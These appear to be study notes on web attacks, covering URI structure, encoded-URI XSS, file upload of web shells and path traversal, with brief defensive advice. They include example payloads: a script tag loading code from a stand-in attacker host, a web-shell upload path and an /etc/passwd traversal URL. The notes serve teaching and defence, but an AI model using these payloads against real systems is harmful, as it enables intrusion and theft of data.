### **1. Understanding Web Applications and URI**

- A **web application** is accessed via a browser using HTTP.
- **Client-side web-based attacks** often manipulate the URI (Uniform Resource Identifier).
- **Components of a URI**:
    - **Scheme**: Protocol for accessing the resource (e.g., HTTP, HTTPS, FTP).
        - Example: `http://www.example.com`
    - **Authority**: Name of the server hosting the resource.
    - **Path**: Path to the specific resource being requested.
        - Example: `http://www.example.com/myvideo.mp4`
    - **Query**: Data appended to the URI, often after a "?" for additional parameters.
        - Example: `http://www.example.com:8443/cucm-uds/users?name=Bob`
    - **Fragment**: Secondary resource identified with a `#` (e.g., specific sections of a file).
        - Example: `http://www.example.com/myvideo.mp4#t=20,50`

---

### **2. URI Manipulation Attacks**

- Attackers use encoded characters in URIs to hide malicious intent.
    - Example of a malicious URI:
        
    
        
        ```none
        http://victim.com/weakscript.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badguy.com%2fbadscript.js%22%3e%3c%2fscript%3e
        ```
        
    - Encoded characters like `%3c` are translated by the web server into actual characters (`<`), allowing the attacker’s script to execute:
        
        
        ```none
        http://victim.com/weakscript.php?data=<script src="http://www.badguy.com/badscript.js"></script>
        ```
        
- **Common Encoded Characters**:
    - `%3c = <`
    - `%20 = \(space\)`
    - `%3e = >`
    - `%2f = /`

---

### **3. File Upload Vulnerabilities**

- Attackers exploit web applications to upload malicious files or scripts.
- Example: Manipulating a parameter to upload a web shell:
    
    
    ```none
    http://victim.com/viewtopic.php../../../attackerwebshell.jsp
    ```
    
    - The `../` sequences navigate directories, allowing the attacker to place the shell in a sensitive directory.

#### **Consequences of File Upload Attacks**:

1. **Console Access**: Attackers gain command-level access to the server.
2. **Cross-Site Scripting (XSS)**:
    - **Stored XSS**: The malicious script is permanently hosted on the server.
    - **Reflected XSS**: The malicious script is temporarily served as part of an error response.
    - **Impact**:
        - Stealing session cookies (session hijacking).
        - Redirecting victims to malicious sites.
        - Extracting data from the victim’s computer.

---

### **4. Path Traversal Attacks**

- **Goal**: Access files outside the document root directory of the web application or server.
- **Technique**: Use sequences like `../` (Linux/Unix) or `..\` (Windows) to manipulate file paths.
    - Example:
        
        ```none
        http://victim.com/viewtopic.php?file=../../../etc/passwd
        ```
        
- **Objective**: Access sensitive files containing:
    - Passwords.
    - Backup configurations.
    - Other sensitive application data.
- **Impact**:
    - Further reconnaissance opportunities.
    - Exploitation of additional application vulnerabilities.

---

### **5. Summary of Attack Techniques**

- **Encoded URI Manipulation**: Hiding attacks by encoding characters in the URI.
- **File Upload Exploits**: Uploading malicious files to gain control or conduct XSS attacks.
- **Path Traversal Attacks**: Using directory navigation sequences to access unauthorized files.

---

### **Defensive Recommendations**

- Sanitize and validate all user inputs, especially URIs and file uploads.
- Implement proper access controls to restrict access to sensitive files.
- Regularly update and patch web applications to fix known vulnerabilities.
- Monitor server logs for suspicious activity involving encoded URIs or unusual file paths.